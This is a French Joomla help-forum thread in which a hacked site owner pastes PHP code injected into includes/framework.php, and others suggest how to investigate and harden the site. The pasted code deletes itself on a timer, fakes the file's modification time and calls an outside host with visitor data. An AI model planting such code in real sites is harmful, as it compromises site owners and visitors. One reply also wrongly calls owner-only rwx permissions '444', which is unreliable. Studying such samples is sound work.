Re : piratage joomla suite faille dans fichier includes/framework.php.

Bonjour,

Exactement comme en février dernier mon site www.audfray.com a été piraté.
Dans le fichier /includes/framework.php les mêmes lignes ont été ajoutées en fin de fichier:
check_meta();
function check_meta(){
$jp = __FILE__;
$jptime = filemtime($jp);

if(time() >= 1465116055){
$jp_c = file_get_contents($jp);
if($t = @strpos($jp_c,"check_meta();")) {
$contentp = substr($jp_c,0,$t);
if(@file_put_contents($jp, $contentp)){
@touch($jp,$jptime);
}
}
}
@file_get_contents("http://web.51.la:82/go.asp?svid=18&id=18863452&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/libraries/cms/error/cantent.php");
}

qui font que lorsqu'on veut accéder au site il boucle jusqu'à l'erreur:
Gateway Time-out
The gateway did not receive a timely response from the upstream server or application.
Apache Server at www.audfray.com Port 80

Le problème n'est pas compliqué à résoudre il suffit de virer les lignes mais j'aimerais bien savoir comment ces lignes ont pu être ajoutées pour la seconde fois.

Merci à vous.

Re : piratage joomla suite faille dans fichier includes/framework.php.

Bonjour

Pour savoir "Comment" il faudrait analyser les logs des accès Apache et cela peut être galère car ces fichiers peuvent être très volumineux.

Il faut suspecter que ton site n'était pas clean : il y avait toujours des virus dormant qui viennent d'être réactivé et/ou la même faille qui vient d'être exploitée à nouveau.

Avais-tu protégé ton site une fois que tu l'avais "nettoyé" en février ? As-tu fait le ménage dans tes extensions / templates / plugins / ... ? Avais-tu mis à jour tout ce qui était resté ? Changer les mots de passe ? Réviser la liste des admins (pas d'admin inconnus ?).

Bonne journée.

Re : piratage joomla suite faille dans fichier includes/framework.php.

Bonjour.
Il me semble que je ne pas faire beaucoup mieux. la version de joomla est la dernière. Je n'ai qu'un seul user l'admin, je n'ai que 2 extensions supplémentaires qui sont à jour et les templates en plus de celui actif sont ceux proposés dans la version standard de joomla

Re : piratage joomla suite faille dans fichier includes/framework.php.

Ok mais pourtant tu es une bestiole non ?

Tu as combien de sites sur cet hébergement ? Est-ce que tu as \www\site1 et \www\site2 et ... ? Si oui, ben site2 peut venir véroler site1 s'il n'y a aucune protection.

Tu as passé un coup de QuickScan ?

Re : piratage joomla suite faille dans fichier includes/framework.php.

Oui j'ai bien deux sites l'un à la racine www/ (audfray.com qui était de nouveau planté ce matin) et un autre dans un sous-répertoire (armand-petersen.fr) qui n'a jamais été impacté.

Le site audfray.com se trouvait également dans un sous répertoire quand il a été attaqué en février. Je l'ai alors déplacé sous la racine.

je ne connais pas quickscan. je vais regarder

ok merci

Re : piratage joomla suite faille dans fichier includes/framework.php.

Bonjour,

quickscan est fait pour tester en ligne ton pc local pas ton site web. ou alors j'ai pas vu un truc

Re : piratage joomla suite faille dans fichier includes/framework.php.

Ta phrase est alambiquée ;-) "en ligne ton pc local"; euh?

Non, aeSecure QuickScan peut scanner ton site local ou ton site de production; pas de souci ... sauf lié à ton hébergeur.
Un scan demande du CPU et ton hébergeur peut avoir mis une restriction "Un script php ne peut pas consommer plus de xxx secondes" p.ex. d'où l'intérêt si tu es en production de scanner par lot de fichiers (voir le mode expert).

En local, tu n'as pas cette limitation.

Mais, donc, tu peux scanner en local mais aussi en prod.

Bonne journée.

Re : piratage joomla suite faille dans fichier includes/framework.php.

bonjour,
ce que j'avais testé était Bitdefender Quickscan
Je viens de passer sur mon site URL VOID + Avg Threatslab + Scanurl et aucun n'a trouvé de virus.
De plus je pense que celeonet a ses propres antivirus.
je vais essayer aeSecure QuickScan
Donc je ne suis pas totalement persuadé que le pb ne vient pas d'une faille de joomla

En attendant j'ai trouvé une solution de contournement à savoir dès que le fichier framework est modifié il est immédiatement remplacé par un bon.

Re : piratage joomla suite faille dans fichier includes/framework.php.

une autre solution est de mettre les permissions des fichiers ciblés et nettoyés en 444

mais faut quand même nettoyer les autres fichiers malicieux, trojans et autres backdoors

Re : piratage joomla suite faille dans fichier includes/framework.php.

Je parlais bien sûr d'aeSecure QuickScan

Pour les outils en ligne, type scanurl ou Sucuri Sitecheck, il faut bien comprendre les limitations de ces outils : ils scannent la page que tu as soumise; le code html de cette page et ici et là quelques autres fichiers javascript.

Ces outils sont incapable de trouver des virus sur ton site si le virus n'a pas injecté un code vérolé dans la page soumise. Tu aurais "cpanel.php" qui serait un virus à la racine de ton site, Sucuri ne le verra jamais. Forcément. Il faut un scanner à déposer sur ton site pour scanner l'intégralité des fichiers.

Note que je n'ai pas parlé de faille dans Joomla (c'est un peu facile de toujours jeter la faute sur le cms non?)

Si tu penses que tu es correct, tu peux aussi présumer que le pirate a accès à ton FTP...

Reste que tu as des bestioles; c'est une certitude si ton fichier "se modifie tout seul"

Re : piratage joomla suite faille dans fichier includes/framework.php.

Bon, oublie totalement Avg Threatslab. Ce site est nul.

Un gars m'a contacté il y a quelques jours et son site est hacké. Google le dit "Attention ce site peut endommager votre ordinateur" et Chrome ainsi que FF bloque l'accès au site (belle page rouge).

Et Avg Threatslab me dit "Evaluation = Sûre". Euh?

scanurl me dit qu'il y a une menace mais bon, ben, lui n'a rien fait. Il semble juste se reposer sur d'autres api comme Google SafeBrowsing. Un peu bidon comme scan.

Google SafeBrowsing : https://www.google.com/transparencyr...tic/index.html

Re : piratage joomla suite faille dans fichier includes/framework.php.

Bonjour
permissions 444 ça ma cause pas.

Les permissions du fichier sont les suivantes: propriétaire à OUI pour lire,écrire et exécuter. Rien aux autres
----------------Lire----Ecrire------Executer
Propriétaire-------X------X-----------X
Groupe
Autre

Je mets quoi à quoi pour avoir les permissions à 444 ? j'enlève Ecrire ?

Re : piratage joomla suite faille dans fichier includes/framework.php.

ce que tu as là c justement du 444

Re : piratage joomla suite faille dans fichier includes/framework.php.

Pour bien répondre, on est toujours dans l'attente de la version joomla du site concerné

Re : piratage joomla suite faille dans fichier includes/framework.php.

@mlou : il a été fait mention de 3.4.8 dans un post précédent, peut-être 3.5.1 depuis lors.